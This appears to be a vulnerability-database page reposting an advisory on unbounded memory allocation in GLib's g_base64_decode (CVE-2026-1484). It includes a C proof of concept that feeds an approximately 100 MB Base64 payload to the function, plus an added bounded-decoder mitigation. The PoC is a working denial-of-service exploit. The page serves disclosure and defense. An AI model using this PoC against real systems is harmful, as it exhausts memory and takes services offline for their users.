📄 GLib Memory Exhaustion

🗓️ 10 Mar 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news | 👁 83 Views

GLib g_base64_decode may allocate unbounded memory for large inputs, enabling denial of service.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| ATTACKERKB | CVE-2026-1485 | 27 Jan 2026 13:43 | attackerkb |
| ATTACKERKB | CVE-2026-1489 | 27 Jan 2026 14:26 | attackerkb |
| ATTACKERKB | CVE-2026-1484 | 27 Jan 2026 13:41 | attackerkb |
| AstraLinux | Astra Linux - vulnerability in glib2.0 | 3 May 2026 23:59 | astralinux |
| AstraLinux | Astra Linux - vulnerability in glib2.0 | 3 May 2026 23:59 | astralinux |
| AstraLinux | Astra Linux - vulnerability in glib2.0 | 3 May 2026 23:59 | astralinux |
| CBLMariner | CVE-2026-1484 affecting package glib for versions less than 2.78.6-7 | 9 Feb 2026 23:37 | cbl_mariner |
| CBLMariner | CVE-2026-1489 affecting package glib for versions less than 2.71.0-10 | 14 Apr 2026 18:44 | cbl_mariner |
| CBLMariner | CVE-2026-1489 affecting package glib for versions less than 2.78.6-8 | 10 Mar 2026 22:56 | cbl_mariner |
| Circl | CVE-2026-1484 | 27 Jan 2026 16:59 | circl |

=============================================================================================================================================
    | # Title     : Unbounded Base64 Decoding in GLib Leading to Memory Exhaustion                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.ubuntu.com/                                                                                                     |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/215078/  & CVE-2026-1484, CVE-2026-1485, CVE-2026-1489
    
    [+] Summary    : The g_base64_decode() function in the GLib library fails to enforce input size limits, allowing attackers to supply extremely large Base64-encoded data, resulting in uncontrolled memory allocation.
                     The vulnerability can be exploited by providing a specially crafted but syntactically valid Base64 string that decodes into an extremely large binary buffer.
                     Upon processing, the function allocates memory proportional to the size of the decoded output without applying upper limits or quota checks, potentially leading to memory exhaustion (denial of service).
                     The provided proof of concept (PoC) demonstrates how to generate and process a large Base64 payload (e.g., decoding to approximately 100 MB),
                     overwhelming the target system's memory and revealing the lack of protective limits in the decoding routine.
                     No memory corruption is required; the exploit relies entirely on resource exhaustion.
      
    [+] POC :   gcc exploit_cve_2026_1484.c -o exploit_cve_2026_1484 `pkg-config --cflags --libs glib-2.0`
    
    #include <glib.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    char* generate_malicious_base64(size_t decoded_target_size, size_t *out_b64_len) {
    
        size_t full_blocks = decoded_target_size / 3;
        size_t remainder   = decoded_target_size % 3;
    
        size_t b64_len = full_blocks * 4;
        if (remainder) b64_len += 4;
    
        char *buffer = malloc(b64_len + 1);
        if (!buffer) return NULL;
    
        memset(buffer, 'Q', b64_len);
    
        // Proper padding
        if (remainder == 1) {
            buffer[b64_len - 1] = '=';
            buffer[b64_len - 2] = '=';
        } else if (remainder == 2) {
            buffer[b64_len - 1] = '=';
        }
    
        buffer[b64_len] = '\0';
    
        if (out_b64_len) *out_b64_len = b64_len;
        return buffer;
    }
    
    void trigger_vulnerability() {
        printf("[*] Testing CVE-2026-1484 - Large Base64 parsing\n");
    
        size_t decoded_target = 1024 * 1024 * 100;
        size_t base64_len = 0;
    
        char *large_base64 = generate_malicious_base64(decoded_target, &base64_len);
        if (!large_base64) {
            printf("[-] Failed to allocate Base64 buffer\n");
            return;
        }
    
        printf("[+] Generated Base64 input: %zu bytes\n", base64_len);
    
        gsize decoded_len = 0;
        guchar *decoded_data = g_base64_decode(large_base64, &decoded_len);
    
        printf("[+] Decoded output size: %zu bytes\n", decoded_len);
    
        if (decoded_data) g_free(decoded_data);
        free(large_base64);
    
        printf("[*] PoC execution finished\n");
    }
    
    int main() {
        trigger_vulnerability();
        return 0;
    }
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
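
A defensive counterpart to the PoC, added here as an example (not code from the advisory or from GLib): a strict Base64 decoder that writes into a caller-owned fixed buffer and stops as soon as the output cap is reached, so memory use no longer depends on input length. The names `b64_decode_bounded` and `B64_*` are hypothetical, and the 1024-byte cap and the 4096-character sample are constructed for the demonstration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum { B64_OK = 0, B64_TOO_LARGE = -1, B64_MALFORMED = -2 };

/* Map one Base64 alphabet character to its 6-bit value, or -1. */
static int b64_val(unsigned char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    return c == '+' ? 62 : c == '/' ? 63 : -1;
}

/* Decode NUL-terminated Base64 into a caller-owned buffer of out_cap bytes.
 * Nothing is allocated here, so memory use is fixed by the caller's cap, and
 * decoding stops at the first byte that would not fit instead of reading on. */
int b64_decode_bounded(const char *in, unsigned char *out,
                       size_t out_cap, size_t *out_len) {
    unsigned acc = 0; int bits = 0;   /* bit accumulator and its valid-bit count */
    size_t n = 0, pad = 0, chars = 0;
    for (; *in; in++) {
        unsigned char c = (unsigned char)*in;
        if (c == '=') { pad++; chars++; continue; }
        int v = b64_val(c);
        if (v < 0 || pad) return B64_MALFORMED;   /* junk, or data after '=' */
        chars++;
        acc = (acc << 6) | (unsigned)v;
        bits += 6;
        if (bits >= 8) {
            if (n == out_cap) return B64_TOO_LARGE;   /* cap hit: stop early */
            bits -= 8;
            out[n++] = (unsigned char)(acc >> bits);
            acc &= (1u << bits) - 1;
        }
    }
    if (pad > 2 || chars % 4 != 0) return B64_MALFORMED;
    *out_len = n;
    return B64_OK;
}

int main(void) {
    static char in[4097];             /* constructed sample: 4096 x 'Q' + NUL */
    unsigned char out[1024];          /* assumed cap for this example */
    size_t n = 0;
    memset(in, 'Q', sizeof in - 1);
    printf("result=%d\n", b64_decode_bounded(in, out, sizeof out, &n));
    return 0;
}
```

Where g_base64_decode() has to stay in place, the equivalent control is a length check on the encoded input before the call, since four input characters produce at most three output bytes.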

10 Mar 2026 00:00 (current)
Vulners AI Score: 5.8 (Medium risk)
CVSS 3.1: 5.4
EPSS: 0.0002